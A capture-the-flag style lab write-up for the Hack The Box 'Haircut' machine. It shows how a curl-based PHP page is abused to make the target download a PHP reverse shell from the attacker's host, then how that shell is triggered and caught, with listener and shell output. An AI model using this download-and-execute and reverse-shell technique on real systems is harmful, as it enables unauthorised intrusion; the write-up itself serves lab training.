InfoSec LAB

Haircut_Exploitation_2

Created: 2 min read

cURL

While the curl command is mostly used for interacting with the web servers, it can be used to do so many other things, such as uploading, downloading, reading, writing of a file as well as even elevating privileges.

In this current assessment, the /exposed.php file is likely using the direct curl command to call in other websites to include. That is the reason why I am able to see the image in the webroot when entering the URL of it.

┌──(kali㉿kali)-[~/archive/htb/labs/haircut]
└─$ echo 'Hello there!' > test.txt

Accessing remote resources also appears to be available.

With this being confirmed, I will be able to gain an initial foothold on the target system by the following method. I will have the target web server download a PHP reverse shell that I will be hosting on Kali and save it under the /uploads/ directory that I enumerated earlier.

Exploitation

┌──(kali㉿kali)-[~/archive/htb/labs/haircut]
└─$ simplehttp .
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Hosting the payload over HTTP for the target web server to fetch and execute

http://10.10.14.5:8000/shell.php -o ./uploads/shell.php

Sending in the cURL command to fetch and save the payload to the /uploads/ directory The payload should now be available at the /uploads/ directory

Good

┌──(kali㉿kali)-[~/archive/htb/labs/haircut]
└─$ curl http://$IP/uploads/shell.php

Triggering the payload

┌──(kali㉿kali)-[~/archive/htb/labs/haircut]
└─$ nnc 9999      
listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.24] 56288
SOCKET: Shell has connected! PID: 4012
whoami
www-data
hostname
haircut
ifconfig
ens160    Link encap:Ethernet  HWaddr 00:50:56:b9:91:bf  
          inet addr:10.10.10.24  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:91bf/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:91bf/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:992984 errors:0 dropped:72 overruns:0 frame:0
          TX packets:988145 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:187291330 (187.2 MB)  TX bytes:370888154 (370.8 MB)
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:160 errors:0 dropped:0 overruns:0 frame:0
          TX packets:160 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:11840 (11.8 KB)  TX bytes:11840 (11.8 KB)

Initial Foothold established to the target system as the www-data user via exploiting cURL

Interactive Graph View

Backlinks